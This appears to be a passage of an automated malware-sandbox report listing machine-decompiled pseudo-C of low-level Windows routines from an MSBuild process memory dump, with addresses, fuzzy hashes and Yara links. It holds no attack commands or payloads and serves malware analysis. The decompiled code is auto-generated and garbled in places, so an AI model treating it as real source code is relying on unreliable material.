				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E010E95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E010E95D0();
				_t33 =  *0x11984c4; // 0x0
				L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x11984c4; // 0x0
				L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x11984c4; // 0x0
				E010C2280(L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x11986b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E010E95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E010E95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E010A9325();
					_t50 =  *0x11984c4; // 0x0
					return E010FD0D1(L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                0x010a9240
                                                                                                0x010a9242
                                                                                                0x010a9247
                                                                                                0x010a924c
                                                                                                0x010a924e
                                                                                                0x010a9255
                                                                                                0x010a9257
                                                                                                0x010a925a
                                                                                                0x010a925f
                                                                                                0x010a925f
                                                                                                0x010a9266
                                                                                                0x010a9271
                                                                                                0x010a9276
                                                                                                0x010a9279
                                                                                                0x010a927e
                                                                                                0x010a9295
                                                                                                0x010a929a
                                                                                                0x010a92b1
                                                                                                0x010a92b6
                                                                                                0x010a92d7
                                                                                                0x010a92dc
                                                                                                0x010a92e0
                                                                                                0x010a92e6
                                                                                                0x010a92e8
                                                                                                0x010a92ee
                                                                                                0x010a9332
                                                                                                0x010a9333
                                                                                                0x010a9337
                                                                                                0x010a9338
                                                                                                0x010a933a
                                                                                                0x010a933a
                                                                                                0x010a933d
                                                                                                0x010a9342
                                                                                                0x010a9342
                                                                                                0x010a9345
                                                                                                0x010a9349
                                                                                                0x010a934e
                                                                                                0x010a9352
                                                                                                0x010a9357
                                                                                                0x010a92f4
                                                                                                0x010a92f4
                                                                                                0x010a92f6
                                                                                                0x010a92f9
                                                                                                0x010a9300
                                                                                                0x010a9306
                                                                                                0x010a9324
                                                                                                0x010a9324

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: be723c16359fbcbadbe1d999d44a36d5f131618c598a09fdc3370c6d84b07221
                                                                                                • Instruction ID: 7d50e07f08e14e9624267edf2f0b5d9dfc26a33cfd620bfb2df4f752e4584a76
                                                                                                • Opcode Fuzzy Hash: be723c16359fbcbadbe1d999d44a36d5f131618c598a09fdc3370c6d84b07221
                                                                                                • Instruction Fuzzy Hash: 7B213972141601DFC725EFA8CA04B9AB7F9BF18708F04456CE199876A1CB34E941CF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01134257 Relevance: .1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E01134257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x11808d0);
				E010FD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E011341E8(__ebx, __edi, __ecx, _t39);
				E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x11987e4;
					_t18 =  *0x11987e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1195cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x11987e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x11987e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L010A7055(_t31 + 0xfffffff8);
								_t24 =  *0x11987e0; // 0x0
								_t18 = _t24 - 1;
								 *0x11987e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1195cd0;
				if( *0x1195cd0 <= 0) {
					L010A7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x11987e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x11987e8 = _t30;
						 *0x11987e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E010FD0D1(L01134320());
			}















                                                                                                0x01134257
                                                                                                0x01134257
                                                                                                0x01134257
                                                                                                0x01134259
                                                                                                0x0113425e
                                                                                                0x01134263
                                                                                                0x01134265
                                                                                                0x01134273
                                                                                                0x01134278
                                                                                                0x0113427c
                                                                                                0x0113427f
                                                                                                0x01134281
                                                                                                0x01134287
                                                                                                0x011342d7
                                                                                                0x011342d7
                                                                                                0x011342da
                                                                                                0x0113428d
                                                                                                0x0113428d
                                                                                                0x0113428f
                                                                                                0x01134292
                                                                                                0x01134297
                                                                                                0x0113429c
                                                                                                0x011342a0
                                                                                                0x011342a6
                                                                                                0x011342a8
                                                                                                0x011342ae
                                                                                                0x011342b3
                                                                                                0x00000000
                                                                                                0x011342ba
                                                                                                0x011342ba
                                                                                                0x011342bf
                                                                                                0x011342c5
                                                                                                0x011342ca
                                                                                                0x011342cf
                                                                                                0x011342d0
                                                                                                0x00000000
                                                                                                0x011342d0
                                                                                                0x011342b3
                                                                                                0x00000000
                                                                                                0x011342a6
                                                                                                0x0113429c
                                                                                                0x011342dc
                                                                                                0x011342dc
                                                                                                0x011342e3
                                                                                                0x01134309
                                                                                                0x011342e5
                                                                                                0x011342e5
                                                                                                0x011342e8
                                                                                                0x011342ee
                                                                                                0x011342f0
                                                                                                0x00000000
                                                                                                0x011342f2
                                                                                                0x011342f2
                                                                                                0x011342f4
                                                                                                0x011342f7
                                                                                                0x011342f9
                                                                                                0x01134300
                                                                                                0x01134300
                                                                                                0x011342f0
                                                                                                0x0113430e
                                                                                                0x0113431f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c41f6082a74c28e483baa8b6d8051e02f6620fba7c5a55a31eeda4e8186d98bb
                                                                                                • Instruction ID: 6b4556f9b0a99e8d9cfeccde6ccf00f4d6b6d2550f1779cb288926b5714c5a10
                                                                                                • Opcode Fuzzy Hash: c41f6082a74c28e483baa8b6d8051e02f6620fba7c5a55a31eeda4e8186d98bb
                                                                                                • Instruction Fuzzy Hash: DB216A70501A06CFC72DDF68E000A58BBF1FB86354B50C26ED1B9DBAAADB31A491CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D2397 Relevance: .1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 34%
                                                                                                			E010D2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x119848c != 0) {
					L010CFAD0(0x1198610);
					if( *0x119848c == 0) {
						E010CFA00(0x1198610, _t19, _t27, 0x1198610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E010D2581(0x1198610, 0x10850a0, _t26, _t27, _t28);
						E010CFA00(0x1198610, 0x10850a0, _t27, 0x1198610);
					}
				} else {
					L1:
					_t11 =  *0x1198614; // 0x0
					if(_t11 == 0) {
						_t11 = E010E4886(0x1081088, 1, 0x1198614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E010D2581(0x1198610, (_t11 << 4) + 0x1085070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                0x010d23b0
                                                                                                0x010d23b6
                                                                                                0x010d2409
                                                                                                0x010d2415
                                                                                                0x01115ae9
                                                                                                0x00000000
                                                                                                0x010d241b
                                                                                                0x010d241b
                                                                                                0x010d241d
                                                                                                0x010d2427
                                                                                                0x010d242e
                                                                                                0x010d2430
                                                                                                0x010d2430
                                                                                                0x010d23b8
                                                                                                0x010d23b8
                                                                                                0x010d23b8
                                                                                                0x010d23bf
                                                                                                0x010d23fc
                                                                                                0x010d23fc
                                                                                                0x010d23c1
                                                                                                0x010d23c3
                                                                                                0x010d23d0
                                                                                                0x010d23d8
                                                                                                0x010d23d8
                                                                                                0x010d23dc
                                                                                                0x010d23de
                                                                                                0x010d23e1
                                                                                                0x010d23e1
                                                                                                0x010d23ec

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 443155e9b9055cd9dbdc44ad068c3bc6d2ecd0d29d66b76b22b9e8d74f8b5119
                                                                                                • Instruction ID: 5b35987ac6a541ee2fc30693e34170d1b9d524968dfef123a3f7ac41f604b674
                                                                                                • Opcode Fuzzy Hash: 443155e9b9055cd9dbdc44ad068c3bc6d2ecd0d29d66b76b22b9e8d74f8b5119
                                                                                                • Instruction Fuzzy Hash: A9112B7274430167E734A62EEC40F59F6D9FBA1610F14806AF6C2EB140CEB0E841CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 011246A7 Relevance: .1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E011246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E010EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E010DD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L010C77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                0x011246b7
                                                                                                0x011246ba
                                                                                                0x011246c5
                                                                                                0x011246c8
                                                                                                0x011246d0
                                                                                                0x011246d4
                                                                                                0x011246e6
                                                                                                0x011246e9
                                                                                                0x011246f4
                                                                                                0x011246ff
                                                                                                0x01124705
                                                                                                0x01124706
                                                                                                0x0112470c
                                                                                                0x01124713
                                                                                                0x0112471b
                                                                                                0x01124723
                                                                                                0x01124725
                                                                                                0x011246d6
                                                                                                0x011246d9
                                                                                                0x011246db
                                                                                                0x011246db
                                                                                                0x01124732

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                • Instruction ID: 731cbd49ca3c01499d4582eb21b8b9cf1fe3cd52bb7a6d6bcc34b73f94571232
                                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                • Instruction Fuzzy Hash: 1711E572504208BFC7159F6DD8808BEB7B9EF95710F10806EF984CB351DA318D55D7A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E37F5 Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 87%
                                                                                                			E010E37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E010C2280(_t6, 0x1198550);
				}
				_t29 = E010E387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E010BFFB0(0x1198550, _t27, 0x1198550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                0x010e37fa
                                                                                                0x010e37fc
                                                                                                0x010e3805
                                                                                                0x010e3808
                                                                                                0x010e3808
                                                                                                0x010e3814
                                                                                                0x010e3818
                                                                                                0x010e3846
                                                                                                0x010e3848
                                                                                                0x010e384b
                                                                                                0x010e384b
                                                                                                0x010e3852
                                                                                                0x00000000
                                                                                                0x010e3854
                                                                                                0x010e3856
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e3863
                                                                                                0x00000000
                                                                                                0x010e3863
                                                                                                0x010e381a
                                                                                                0x010e381a
                                                                                                0x010e381f
                                                                                                0x010e386e
                                                                                                0x010e386e
                                                                                                0x010e3871
                                                                                                0x010e3873
                                                                                                0x010e3873
                                                                                                0x010e3868
                                                                                                0x00000000
                                                                                                0x010e3868
                                                                                                0x010e3821
                                                                                                0x010e3826
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010e3828
                                                                                                0x010e382a
                                                                                                0x010e3841
                                                                                                0x00000000
                                                                                                0x010e3841

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 31af3f31a19ede0e1b0ccc411b206143bfcd51eb681dd9f3ecadfcf7d23e600a
                                                                                                • Instruction ID: df4a32b44c792db01edbbaa0df0377928a76255078ff8153c7e42734b7a9a5c9
                                                                                                • Opcode Fuzzy Hash: 31af3f31a19ede0e1b0ccc411b206143bfcd51eb681dd9f3ecadfcf7d23e600a
                                                                                                • Instruction Fuzzy Hash: C101A1729017119FC3278B1F9A48A2ABFE6FF86A5071540AAE9958F215DB30C801CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D002D Relevance: .1, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010D002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E010C7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E010C7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E010C7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E010C7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                0x010d0032
                                                                                                0x010d0037
                                                                                                0x010d0043
                                                                                                0x01114b3a
                                                                                                0x010d0049
                                                                                                0x010d0049
                                                                                                0x010d0049
                                                                                                0x010d004e
                                                                                                0x010d0053
                                                                                                0x01114b48
                                                                                                0x01114b5a
                                                                                                0x01114b4a
                                                                                                0x01114b53
                                                                                                0x01114b53
                                                                                                0x01114b5f
                                                                                                0x00000000
                                                                                                0x01114b61
                                                                                                0x00000000
                                                                                                0x01114b61
                                                                                                0x010d0059
                                                                                                0x010d0059
                                                                                                0x010d0060
                                                                                                0x01114b6f
                                                                                                0x01114b6f
                                                                                                0x010d0069
                                                                                                0x01114b83
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114b90
                                                                                                0x01114b9b
                                                                                                0x01114b9b
                                                                                                0x01114ba4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114baa
                                                                                                0x00000000
                                                                                                0x010d006f
                                                                                                0x010d006f
                                                                                                0x00000000
                                                                                                0x010d006f
                                                                                                0x010d0069

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                • Instruction ID: 7f63ff00e0d68dad8cfb02030675e876904cf9dfae2a5c9873be3a9608d9dae9
                                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                • Instruction Fuzzy Hash: 751104722057819FE727972CC944B39BBE4BF40F54F0900F0FE498BA96D329D841CA68
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B766D Relevance: .1, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E010B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E010DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E010DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L010C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                0x010b7672
                                                                                                0x010b767f
                                                                                                0x010b7689
                                                                                                0x010b76de
                                                                                                0x010b76de
                                                                                                0x010b768b
                                                                                                0x010b7691
                                                                                                0x010b7693
                                                                                                0x010b7697
                                                                                                0x00000000
                                                                                                0x010b7699
                                                                                                0x010b76a8
                                                                                                0x00000000
                                                                                                0x010b76aa
                                                                                                0x010b76ad
                                                                                                0x010b76b1
                                                                                                0x00000000
                                                                                                0x010b76b3
                                                                                                0x010b76b3
                                                                                                0x010b76b5
                                                                                                0x010b76ba
                                                                                                0x010b76bc
                                                                                                0x010b76bc
                                                                                                0x010b76c0
                                                                                                0x00000000
                                                                                                0x010b76c2
                                                                                                0x010b76ce
                                                                                                0x010b76ce
                                                                                                0x010b76c0
                                                                                                0x010b76b1
                                                                                                0x010b76a8
                                                                                                0x010b7697
                                                                                                0x010b76d9

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                • Instruction ID: 1bed590c8614d49bf8c104bee4346368f418628467552869ba9004c1a8bff86a
                                                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                • Instruction Fuzzy Hash: B0018832700219AFD7309E5ECC91EDB7BADEBC8660B154574BA49CB294DA70DD0187A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010A9080 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E010A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x11985ec;
				E010C2280(_t48, 0x11985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E010BFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x119538c; // 0x77e16828
					if( *_t84 != 0x1195388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x117f6e8);
						E010FD0E8(0x11985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E011788F5(_t80, _t85, 0x1195388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x11986c0; // 0xc507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x11986b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E010C2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E011788F5(0x11985ec, _t85, 0x1195388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E010EAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
